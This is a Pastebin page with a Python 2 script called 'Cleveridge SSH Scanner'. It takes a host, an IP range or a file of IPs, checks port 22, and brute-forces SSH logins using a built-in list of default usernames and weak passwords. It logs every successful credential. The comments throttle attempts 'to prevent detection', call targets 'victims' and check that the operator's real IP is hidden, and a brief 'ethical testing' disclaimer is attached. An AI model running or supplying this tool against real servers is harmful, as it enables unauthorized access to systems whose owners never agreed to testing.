API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 16th, 2018
282
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.83 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2.  
  3. version = "V0.04"
  4. build = "019"
  5.  
  6. import getpass
  7. import glob
  8. import os
  9. import socket
  10. import ssl
  11. import sys
  12. import time
  13. try:
  14. import urllib.request as urllib2
  15. except ImportError:
  16. import urllib2
  17. try:
  18. import pxssh
  19. except ImportError:
  20. from pexpect import pxssh as pxssh
  21. from datetime import datetime
  22. from urllib import urlopen
  23.  
  24.  
  25.  
  26.  
  27. #++ FUNCTIONS //#
  28.  
  29. # func Writelog
  30. def func_writelog(how, logloc, txt): # how: a=append, w=new write
  31. with open(logloc, how) as mylog:
  32. mylog.write(txt)
  33.  
  34.  
  35. # func ScanHost
  36. def func_scanhost(ip, logloc):
  37. # Log Scan
  38. txt = "\n*****************************\nScanning IP : %s" % (ip)
  39. func_writelog("a", logloc, txt + "\n")
  40. print txt
  41.  
  42. # check if SSH-port is open
  43. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  44. result = sock.connect_ex((ip, 22))
  45.  
  46. if result == 0: # if SSH-port is open
  47. txt = "Port 22 (SSH) is accessible."
  48. func_writelog("a", logloc, txt + "\n")
  49. print txt
  50. found = False # default : credentials not found yet
  51. blocked = False # default : not blocked by victim host
  52. tried = 0
  53.  
  54. for usr in user: # run through all usernames
  55. if found == True: # if credentials were found with previous combination -> exit
  56. break
  57.  
  58. if blocked == True: # if you are blocked by victim -> exit and go to next victim
  59. break
  60.  
  61. for pwd in pswd: # run through all passwords for each username
  62. print('* Try %s:%s' % (usr, pwd)),
  63. time.sleep (500.0 / 1000.0) # slow down to prevent detection
  64. tried += 1
  65.  
  66. try: # try to connect
  67. s = pxssh.pxssh()
  68. s.login (hostname, usr, pwd)
  69. s.sendline ('uptime') # run a command
  70. s.prompt() # match the prompt
  71. print "@ %s SUCCESS ***********" % (ip)
  72. print s.before # print everything before the prompt.
  73. txt = '%s:%s @ %s SUCCESS ************/n%s' % (usr, pwd, ip, s.before)
  74. func_writelog("a", logloc, txt + "\n")
  75. found = True
  76. break
  77. except Exception as ex: # can't connect with this credentials
  78. print "failed - "
  79. response = str(ex)
  80. print response
  81. if response == "could not synchronize with original prompt" or response == "could not set shell prompt" :
  82. txt = 'Stopped due to Error response'
  83. func_writelog('a', logloc, txt + '\n')
  84. print txt
  85. blocked = True
  86. break
  87. elif response[:17] == "End Of File (EOF)" :
  88. txt = 'Stopped due to blocked by victim'
  89. func_writelog('a', logloc, txt + '\n')
  90. print txt
  91. blocked = True
  92. break
  93.  
  94. txt = "Tried " + str(tried) + " combinations"
  95. func_writelog("a", logloc, txt + "\n")
  96. print txt
  97.  
  98.  
  99. else: # if SSH-port is closed
  100. txt = "Port 22 (SSH) is closed."
  101. func_writelog("a", logloc, txt + "\n")
  102. print txt
  103.  
  104. # func CheckIPrange
  105. def func_checkIPrange(ip_range):
  106. print 'Checking IP range... ',
  107. reply = False
  108. posHyphen = ip_range.find('-')
  109. if int(posHyphen) > 6 and int(posHyphen) <= 15 :
  110. ip_first = ip_range[:posHyphen]
  111. ip_untill = ip_range[posHyphen +1:]
  112. ip_first_parts = ip_first.split('.')
  113. if len(ip_first_parts) == 4 :
  114. try :
  115. if (int(ip_first_parts[0]) < 257 and int(ip_first_parts[0]) >= 0) and (int(ip_first_parts[1]) < 257 and int(ip_first_parts[1]) >= 0) and (int(ip_first_parts[2]) < 257 and int(ip_first_parts[2]) >= 0) and (int(ip_first_parts[3]) < 257 and int(ip_first_parts[3]) >= 0) and (int(ip_untill) < 257 and int(ip_untill) >= 0):
  116. reply = True
  117. except Exception :
  118. #nothing
  119. print '.',
  120.  
  121. print "Done"
  122. return reply
  123.  
  124. # func Create IP list of range
  125. def func_createIPlist(ip_range):
  126. print 'Creating IP list...',
  127. posHyphen = ip_range.find('-')
  128. ip_first = ip_range[:posHyphen]
  129. ip_untill = ip_range[posHyphen +1:]
  130. ip_first_parts = ip_first.split('.')
  131. ip_list = []
  132.  
  133. for x in range(int(ip_first_parts[3]), int(ip_untill)+1):
  134. ip_list.append(str(ip_first_parts[0]) + '.' + str(ip_first_parts[1]) + '.' + str(ip_first_parts[2]) + '.' + str(x))
  135. print 'Done'
  136. return ip_list
  137.  
  138. # func Get files from /data directory
  139. def func_getDataFiles():
  140. data_files = glob.glob("data/*")
  141. return data_files
  142.  
  143. # func fill Text with something
  144. def func_fillText(item, times):
  145. txt = ""
  146. i = 0
  147. while i < int(times) :
  148. txt += str(item)
  149. i += 1
  150. return txt
  151.  
  152. # func Show Data Files to attack
  153. def func_printDataFileOptions(data_files):
  154.  
  155. # If no files in default directory
  156. empty = False
  157. if data_files == False or len(data_files) == 0:
  158. empty = True
  159.  
  160. # Add files to menu options
  161. i = 1
  162. ops = {}
  163. for f in data_files :
  164. ops[i] = f
  165. i += 1
  166.  
  167. # Add default items to menu options
  168. ops['e'] = "Exit Program"
  169.  
  170. # Create Menu
  171. ln = []
  172. inner_length = 50
  173. ln.append(" *" + func_fillText("*", inner_length) + "*")
  174. ln.append(" * " + "Select a file from the data/ directory" + func_fillText(" ", inner_length-38-2) + " *") # inner_length-38-2 = inner_length - text_length - outside spaces
  175. ln.append(" *" + func_fillText("-", inner_length) + "*")
  176.  
  177. if empty == True:
  178. ln.append(" * " + "Data directory is empty" + func_fillText(" ", inner_length-23-2) + " *")
  179. ln.append(" *" + func_fillText(" ", inner_length) + "*")
  180.  
  181. for o in ops :
  182. o_txt = str(o) + " : " + str(ops[o])
  183.  
  184. # if text to long for menu
  185. if len(o_txt) > 45 :
  186. first = o_txt[:35]
  187. last = o_txt[-6:]
  188. o_txt = first + "..." + last
  189.  
  190. # file output
  191. ln.append(" * " + o_txt + func_fillText(" ", inner_length-len(o_txt)-2) + " *")
  192.  
  193. ln.append(" *" + func_fillText("*", inner_length) + "*")
  194.  
  195. txt = "\n"
  196. for item in ln :
  197. txt = txt + str(item) + "\n"
  198.  
  199. # return
  200. return txt
  201.  
  202. # func Exit
  203. def func_exit():
  204. print "Exiting...\n\nThanks for using\nCleveridge SSH Scanner\n\nCleveridge : https://cleveridge.org/nSSH Scanner : https://github.com/Cleveridge/cleveridge-ssh-scanner"
  205.  
  206.  
  207.  
  208.  
  209.  
  210. #++ PROGRAM ++#
  211. os.system('clear')
  212. user = ["root", "admin", "sysadmin", "oracle", "webmaster", "pi"]
  213. pswd = ["root", "toor", "admin", "000000", "1111", "111111", "11111111", "123", "123.com", "123123", "123123123", "1234", "12345", "123456", "1234567", "12345678", "123456789", "1234567890", "1234qwer", "123abc", "123qwe", "123qweasd", "147147", "1q2w3e", "1q2w3e4r", "1q2w3e4r5t", "1q2w3e4r5t6y", "1qaz2wsx", "1qaz2wsx3edc", "1qazxsw2", "abc123", "abc@123", "Admin@123", "P@ssw0rd", "Password1", "a123456", "admin1", "admin123", "admin@123", "adminadmin", "administrator", "changeme", "cisco", "cisco123", "default", "firewall", "letmein", "linux", "oracle", "p@ssw0rd", "passw0rd", "password", "q1w2e3r4", "q1w2e3r4t5", "qwerty", "r00t", "raspberry", "redhat", "root123", "rootpass", "rootroot", "server", "test", "test123", "zaq1xsw2"]
  214.  
  215. print "************************************************"
  216. print "|| CLEVERIDGE SSH SCANNER ||"
  217. print "************************************************"
  218. print "|| IMPORTANT: ||"
  219. print "|| This tool is for ethical testing purpose ||"
  220. print "|| only. ||"
  221. print "|| Cleveridge and its owners can't be held ||"
  222. print "|| responsible for misuse by users. ||"
  223. print "|| Users have to act as permitted by local ||"
  224. print "|| law rules. ||"
  225. print "************************************************\n"
  226. print "Version %s build %s" % (version, build)
  227.  
  228.  
  229.  
  230.  
  231.  
  232.  
  233.  
  234.  
  235.  
  236.  
  237. """
  238. ON FIRST RUN : SETTING UP BASIC FILES AND FOLDERS
  239. BEGIN:
  240. """
  241.  
  242. #-- Creating default log directory
  243. logdir = "log"
  244. if not os.path.exists(logdir):
  245. os.makedirs(logdir)
  246. txt = "Directory 'log/' created"
  247. print txt
  248.  
  249. """ Every run : create log file """
  250. #-- Creating log file in directory 'log' --#
  251. now = datetime.now()
  252. logfile = str(now.year) + str(format(now.month, '02d')) + str(format(now.day, '02d')) + '_' + str(format(now.hour, '02d')) + str(format(now.minute, '02d')) + str(format(now.second, '02d')) + ".log"
  253. print "Creating log : log/%s" % (logfile),
  254. logloc = logdir + "/" + logfile
  255. with open(logloc, "w") as mylog:
  256. os.chmod(logloc, 0660)
  257. mylog.write("Log created by Cleveridge SSH Scanner - " + version + " build " + build + "\n\n")
  258. print ".... Done"
  259. """ """
  260.  
  261. #-- Creating default configuration in directory 'cnf' --#
  262. txt = "Checking configuration status"
  263. func_writelog("a", logloc, txt + "\n")
  264. print txt
  265.  
  266.  
  267. # if no cnf directory -> Create
  268. cnfdir = "cnf"
  269. if not os.path.exists(cnfdir) :
  270. os.makedirs(cnfdir)
  271. txt = "Directory 'cnf/' created"
  272. func_writelog("a", logloc, txt + "\n")
  273. print txt
  274.  
  275.  
  276. # if no user ip file in cnf -> create
  277. file_userip = cnfdir + "/userip.cnf"
  278. if not os.path.exists(file_userip) :
  279. with open(file_userip, "w") as myuserip :
  280. os.chmod(file_userip, 0660)
  281. myuserip.write("1.1.1.1")
  282. txt = "File 'userip.cnf' created in 'cnf/'"
  283. func_writelog("a", logloc, txt + "\n")
  284. print txt
  285.  
  286.  
  287. # if default file directory not exist -> create
  288. datadir = 'data'
  289. if not os.path.exists(datadir) :
  290. os.makedirs(datadir)
  291. txt = "Directory 'data/' created"
  292. func_writelog("a", logloc, txt + "\n")
  293. print txt
  294.  
  295. """
  296. :END
  297. ON FIRST RUN : SETTING UP BASIC FILES AND FOLDERS
  298. """
  299.  
  300.  
  301.  
  302.  
  303.  
  304.  
  305.  
  306. print " " # to create a better view of the logs on screen
  307.  
  308.  
  309. #-- Register date and time of scan --#
  310. txt = "Tool started : %s/%s/%s - %s:%s:%s" % (now.year, format(now.month, '02d'), format(now.day, '02d'), format(now.hour, '02d'), format(now.minute, '02d'), format(now.second, '02d'))
  311. func_writelog("a", logloc, txt + "\n\n")
  312. print txt
  313. print " "
  314.  
  315. #-- Verify users IP --#
  316. print "Fill out your machines IP. This is the IP you want to hide!!"
  317. print "If the IP is the same as the default, just hit [Enter]..."
  318. with open(file_userip, 'r') as cont :
  319. content = cont.read()
  320. my_ip = raw_input("Your IP [" + content + "] : ") or content
  321. with open(file_userip, 'w') as myuserip : # save new value
  322. myuserip.write(my_ip[:15]) # save not more then 15 chars
  323.  
  324.  
  325. #-- Local IP --#
  326. txt = "Local IP : " + [(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
  327. func_writelog("a", logloc, txt + "\n")
  328. print txt
  329.  
  330. #-- Visible IP --#
  331. ctx = ssl.create_default_context()
  332. ctx.check_hostname = False
  333. ctx.verify_mode = ssl.CERT_NONE
  334. try :
  335. visible_ip = urllib2.urlopen('https://cleveridge.org/_exchange/open_files/return_ip.php?s=ssh_scan', context=ctx).read()
  336. except Exception :
  337. visible_ip = urllib2.urlopen('https://enabledns.com/ip', context=ctx).read()
  338. txt = "Visible IP : " + visible_ip
  339. func_writelog("a", logloc, txt + "\n")
  340. print txt
  341.  
  342. #-- if private IP is visible
  343. if visible_ip == my_ip: # if your real ip is visible -> Break up
  344. txt = " Your IP is visible !!!\n \n" # Add 'Socks4 127.0.0.1 9050' to /etc/proxychains.conf.\n Start Tor service, then \n proxychains ./cl_ssh_scan.py"
  345. func_writelog("a", logloc, txt + "\n")
  346. print txt
  347.  
  348. if True :
  349.  
  350. # Select Method
  351. print "\n\n *************************************\n * Select a method : *\n *************************************\n * h : Scan one host ip *\n * r : Scan a range of IP's *\n * f : Scan IP's from file (one/row) *\n *************************************"
  352. method = raw_input(' * Method : ')
  353. txt = "Selected Method : "
  354. func_writelog("a", logloc, txt)
  355. print txt,
  356.  
  357.  
  358. if method == 'h':
  359. # Selected Method : (h)ost
  360.  
  361. txt = "Scan one host IP"
  362. func_writelog("a", logloc, txt + "\n\n")
  363. print txt
  364.  
  365. hostname = raw_input('Hostname : ')
  366. func_scanhost(hostname, logloc)
  367.  
  368. elif method == 'r':
  369. # Selected Method : (r)ange
  370.  
  371. txt = "Scan IP range"
  372. func_writelog("a", logloc, txt + "\n\n")
  373. print txt
  374.  
  375. print "Fill out an IP range like 192.168.0.1-25"
  376. ip_range = raw_input('IP range : ')
  377.  
  378. # If IP range is valid > execute
  379. if(func_checkIPrange(ip_range) != True): # if not valid
  380. txt = "IP range not valid !! e.g. 192.168.0.1-25"
  381. func_writelog("a", logloc, txt + "\n")
  382. print txt
  383. else : # if valid ip range
  384.  
  385. # log
  386. txt = "IP range %s is valid" % (ip_range)
  387. func_writelog("a", logloc, txt + "\n\n")
  388. print txt
  389.  
  390. # creating ip list
  391. ip_l = func_createIPlist(ip_range)
  392.  
  393. # run scan for every ip in range
  394. for hostname in ip_l:
  395. func_scanhost(hostname, logloc)
  396.  
  397.  
  398. elif method == 'f':
  399. #Selected Method : (f)ile
  400.  
  401. txt = "Scan IP's from file"
  402. func_writelog("a", logloc, txt + "\n\n")
  403. print txt
  404.  
  405. d_files = func_getDataFiles()
  406. txt = func_printDataFileOptions(d_files)
  407. print txt[:-1] # to remove the last \n
  408.  
  409. ip_file = raw_input(" * Select : ")
  410.  
  411. # Get File contents or Exit
  412. goon = False
  413. try:
  414. val = int(ip_file)
  415. goon = True
  416. val = val -1 # because array keys are options -1
  417. except Exception :
  418. print 'No file selected'
  419.  
  420. # if selection is an integer and if selection exists -> execute else exit
  421. ip_l = []
  422. if goon == True :
  423. print d_files[val]
  424. try :
  425. fl = open(d_files[val], 'r')
  426.  
  427. txt = "Selected File : " + str(d_files[val])
  428. func_writelog("a", logloc, txt + "\n")
  429. print txt
  430.  
  431.  
  432. for line in fl :
  433. if len(line) > 6 :
  434. line = line.rstrip()
  435. ip_l.append(line)
  436. print('- %s') % line
  437. except Exception :
  438. print 'Selection not valid'
  439. else :
  440. func_exit()
  441.  
  442. # if ip's in file else exit
  443. if len(ip_l) > 0 :
  444. # If valid IP -> run scan
  445. for hostname in ip_l :
  446. try :
  447. socket.inet_aton(hostname)
  448. func_scanhost(hostname, logloc)
  449. except socket.error :
  450. print "Contains an unvalid IP"
  451. else :
  452. print "The selected file seems empty"
  453. func_exit()
  454.  
  455. else :
  456. func_exit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!